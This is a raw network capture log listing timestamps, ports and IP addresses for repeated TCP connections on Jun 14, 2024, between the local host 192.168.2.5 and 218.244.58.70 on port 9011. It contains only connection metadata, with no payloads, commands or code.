Jun 14, 2024 16:40:33.169195890 CEST	52059	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:33.174225092 CEST	9011	52059	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:33.195102930 CEST	52059	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:33.200048923 CEST	9011	52059	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:33.254483938 CEST	52059	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:33.270874023 CEST	9011	52059	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:33.280093908 CEST	52059	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:33.292747974 CEST	9011	52059	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:33.304068089 CEST	52059	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:33.309051991 CEST	9011	52059	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:33.347537994 CEST	52059	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:33.352529049 CEST	9011	52059	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:33.372106075 CEST	52059	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:33.377187967 CEST	9011	52059	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:33.426470041 CEST	52059	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:33.431585073 CEST	9011	52059	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:33.445632935 CEST	52059	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:33.450545073 CEST	9011	52059	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:33.482378960 CEST	52059	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:33.487632036 CEST	9011	52059	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:33.519906044 CEST	52059	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:33.524880886 CEST	9011	52059	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:33.543593884 CEST	52059	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:33.548759937 CEST	9011	52059	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:33.566867113 CEST	52059	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:33.572173119 CEST	9011	52059	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:33.585181952 CEST	52059	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:33.600353003 CEST	9011	52059	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:33.618839979 CEST	52059	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:33.623936892 CEST	9011	52059	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:33.707250118 CEST	52059	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:33.712260962 CEST	9011	52059	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:33.743505955 CEST	52059	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:33.748928070 CEST	9011	52059	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:33.761111975 CEST	9011	52059	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:33.761424065 CEST	52059	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:33.761599064 CEST	52059	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:33.766449928 CEST	9011	52059	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:38.779458046 CEST	52060	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:38.784512043 CEST	9011	52060	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:38.784593105 CEST	52060	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:38.785209894 CEST	52060	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:38.791574001 CEST	9011	52060	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:38.823457956 CEST	52060	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:39.199428082 CEST	52060	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:39.887552977 CEST	9011	52060	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:39.887640953 CEST	52060	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:39.888391972 CEST	9011	52060	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:39.888446093 CEST	52060	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:39.888767004 CEST	9011	52060	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:39.888777018 CEST	9011	52060	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:39.898071051 CEST	9011	52060	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:39.898081064 CEST	9011	52060	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:45.028616905 CEST	52061	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:45.033459902 CEST	9011	52061	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:45.033588886 CEST	52061	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:45.038317919 CEST	52061	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:45.045062065 CEST	9011	52061	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:45.055511951 CEST	52061	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:45.060283899 CEST	9011	52061	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:45.109882116 CEST	52061	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:45.114749908 CEST	9011	52061	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:45.144650936 CEST	52061	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:45.149554968 CEST	9011	52061	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:45.171869040 CEST	52061	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:45.176964998 CEST	9011	52061	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:45.204540014 CEST	52061	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:45.209808111 CEST	9011	52061	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:45.278033972 CEST	52061	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:45.282916069 CEST	9011	52061	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:45.303101063 CEST	52061	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:45.308151960 CEST	9011	52061	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:45.316699982 CEST	52061	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:45.322500944 CEST	9011	52061	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:45.331693888 CEST	52061	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:45.336713076 CEST	9011	52061	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:45.385267019 CEST	52061	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:45.390338898 CEST	9011	52061	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:45.427145004 CEST	52061	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:45.434346914 CEST	9011	52061	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:45.450752974 CEST	52061	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:45.455950975 CEST	9011	52061	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:45.488805056 CEST	52061	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:45.493872881 CEST	9011	52061	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:45.522325039 CEST	52061	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:45.528096914 CEST	9011	52061	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:45.608392954 CEST	52061	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:45.613377094 CEST	9011	52061	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:45.668720961 CEST	52061	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:45.673516989 CEST	9011	52061	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:45.708122969 CEST	52061	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:45.712985039 CEST	9011	52061	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:45.736814022 CEST	9011	52061	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:45.736880064 CEST	52061	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:45.820101976 CEST	52061	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:50.985580921 CEST	52062	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:50.991055965 CEST	9011	52062	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:50.991765022 CEST	52062	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:50.992407084 CEST	52062	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:50.997695923 CEST	9011	52062	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:51.035422087 CEST	52062	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:51.040224075 CEST	9011	52062	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:51.099493980 CEST	52062	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:51.104414940 CEST	9011	52062	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:51.144133091 CEST	52062	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:51.149013042 CEST	9011	52062	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:51.172065973 CEST	52062	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:51.177241087 CEST	9011	52062	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:51.240582943 CEST	52062	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:51.245759964 CEST	9011	52062	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:51.265103102 CEST	52062	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:51.270066023 CEST	9011	52062	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:51.283721924 CEST	52062	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:51.288852930 CEST	9011	52062	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:51.300702095 CEST	52062	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:51.305557013 CEST	9011	52062	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:51.315227032 CEST	52062	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:51.320097923 CEST	9011	52062	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:51.345021963 CEST	52062	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:51.349936962 CEST	9011	52062	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:51.370968103 CEST	52062	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:51.375847101 CEST	9011	52062	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:51.401055098 CEST	52062	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:51.406204939 CEST	9011	52062	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:51.413026094 CEST	52062	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:51.417889118 CEST	9011	52062	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:51.429162979 CEST	52062	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:51.434030056 CEST	9011	52062	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:51.442066908 CEST	52062	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:51.446860075 CEST	9011	52062	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:51.470763922 CEST	52062	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:51.475835085 CEST	9011	52062	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:51.514416933 CEST	52062	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:51.519429922 CEST	9011	52062	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:51.547240973 CEST	52062	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:51.552225113 CEST	9011	52062	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:51.598557949 CEST	52062	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:51.605401993 CEST	9011	52062	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:51.637948990 CEST	52062	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:51.642925978 CEST	9011	52062	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:51.691587925 CEST	52062	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:51.696707964 CEST	9011	52062	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:51.714409113 CEST	9011	52062	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:51.714550018 CEST	52062	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:51.714603901 CEST	52062	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:51.719583988 CEST	9011	52062	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:56.754987001 CEST	52063	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:56.759917021 CEST	9011	52063	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:56.760097027 CEST	52063	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:56.760754108 CEST	52063	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:56.766933918 CEST	9011	52063	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:56.787831068 CEST	52063	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:56.792742014 CEST	9011	52063	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:56.839870930 CEST	52063	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:56.845532894 CEST	9011	52063	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:56.876471996 CEST	52063	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:56.881303072 CEST	9011	52063	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:56.923693895 CEST	52063	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:56.931732893 CEST	9011	52063	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:56.969491959 CEST	52063	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:56.974409103 CEST	9011	52063	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:57.024277925 CEST	52063	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:57.029094934 CEST	9011	52063	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:57.058047056 CEST	52063	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:57.062949896 CEST	9011	52063	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:57.088093996 CEST	52063	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:57.093162060 CEST	9011	52063	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:57.146123886 CEST	52063	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:57.151148081 CEST	9011	52063	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:57.165604115 CEST	52063	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:57.170517921 CEST	9011	52063	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:57.184525967 CEST	52063	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:57.189429045 CEST	9011	52063	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:57.228570938 CEST	52063	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:57.233381987 CEST	9011	52063	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:57.272722006 CEST	52063	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:57.277635098 CEST	9011	52063	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:57.295361042 CEST	52063	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:57.300229073 CEST	9011	52063	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:57.333882093 CEST	52063	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:57.338794947 CEST	9011	52063	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:57.364172935 CEST	52063	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:57.369299889 CEST	9011	52063	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:57.407999992 CEST	52063	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:57.412962914 CEST	9011	52063	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:57.444981098 CEST	52063	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:57.449800014 CEST	9011	52063	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:57.471129894 CEST	52063	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:57.472995043 CEST	9011	52063	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:57.473105907 CEST	52063	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:57.473177910 CEST	52063	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:40:57.475928068 CEST	9011	52063	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:57.478004932 CEST	9011	52063	218.244.58.70	192.168.2.5
Jun 14, 2024 16:40:57.478014946 CEST	9011	52063	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:02.684565067 CEST	52064	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:02.689827919 CEST	9011	52064	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:02.690035105 CEST	52064	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:02.693397999 CEST	52064	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:02.698739052 CEST	9011	52064	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:02.750317097 CEST	52064	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:02.755836964 CEST	9011	52064	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:02.800863981 CEST	52064	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:02.806133986 CEST	9011	52064	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:02.878205061 CEST	52064	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:02.883737087 CEST	9011	52064	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:02.892833948 CEST	52064	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:02.897751093 CEST	9011	52064	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:02.920042992 CEST	52064	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:02.925460100 CEST	9011	52064	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:02.948745012 CEST	52064	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:02.953795910 CEST	9011	52064	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:02.979520082 CEST	52064	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:02.984498024 CEST	9011	52064	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:02.991852045 CEST	52064	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:02.996709108 CEST	9011	52064	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:03.001923084 CEST	52064	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:03.007143021 CEST	9011	52064	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:03.009613991 CEST	52064	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:03.014559031 CEST	9011	52064	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:03.022087097 CEST	52064	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:03.026890993 CEST	9011	52064	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:03.035001040 CEST	52064	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:03.040323019 CEST	9011	52064	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:03.051858902 CEST	52064	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:03.056763887 CEST	9011	52064	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:03.071253061 CEST	52064	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:03.076360941 CEST	9011	52064	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:03.096901894 CEST	52064	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:03.101869106 CEST	9011	52064	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:03.116154909 CEST	52064	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:03.121220112 CEST	9011	52064	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:03.138577938 CEST	52064	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:03.143560886 CEST	9011	52064	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:03.155869007 CEST	52064	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:03.160806894 CEST	9011	52064	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:03.194226027 CEST	52064	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:03.199750900 CEST	9011	52064	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:03.235621929 CEST	52064	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:03.240865946 CEST	9011	52064	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:03.273679018 CEST	52064	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:03.278769970 CEST	9011	52064	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:03.312400103 CEST	52064	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:03.317184925 CEST	9011	52064	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:03.336613894 CEST	52064	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:03.341671944 CEST	9011	52064	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:03.382366896 CEST	52064	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:03.387181997 CEST	9011	52064	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:03.393254995 CEST	9011	52064	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:03.393444061 CEST	52064	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:03.393481970 CEST	52064	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:03.398416042 CEST	9011	52064	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:08.494112968 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:08.499068975 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:08.499138117 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:08.499780893 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:08.504555941 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:08.511828899 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:08.516644001 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:08.557620049 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:08.562474012 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:08.586441040 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:08.591434956 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:08.601769924 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:08.606745958 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:08.620692968 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:08.625657082 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:08.655056000 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:08.660459042 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:08.668893099 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:08.673732996 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:08.684954882 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:08.689816952 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:08.695724010 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:08.700581074 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:08.708183050 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:08.713033915 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:08.728210926 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:08.733074903 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:08.769463062 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:08.774485111 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:08.794516087 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:08.799482107 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:08.816333055 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:08.821187019 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:08.828448057 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:08.833328962 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:08.839418888 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:08.844368935 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:08.865910053 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:08.870975971 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:08.886508942 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:08.891627073 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:08.917469978 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:08.922434092 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:08.948729992 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:08.953691959 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:08.993398905 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.009284973 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.015923977 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.022151947 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.034714937 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.039665937 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.075728893 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.080852032 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.081860065 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.086946964 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.120642900 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.125669003 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.149096966 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.154432058 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.170640945 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.175990105 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.179102898 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.187051058 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.187124968 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.193569899 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.194700956 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.199903965 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.203936100 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.210458994 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.234364986 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.240956068 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.254240036 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.260250092 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.268464088 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.273406982 CEST	9011	52065	218.244.58.70	192.168.2.5
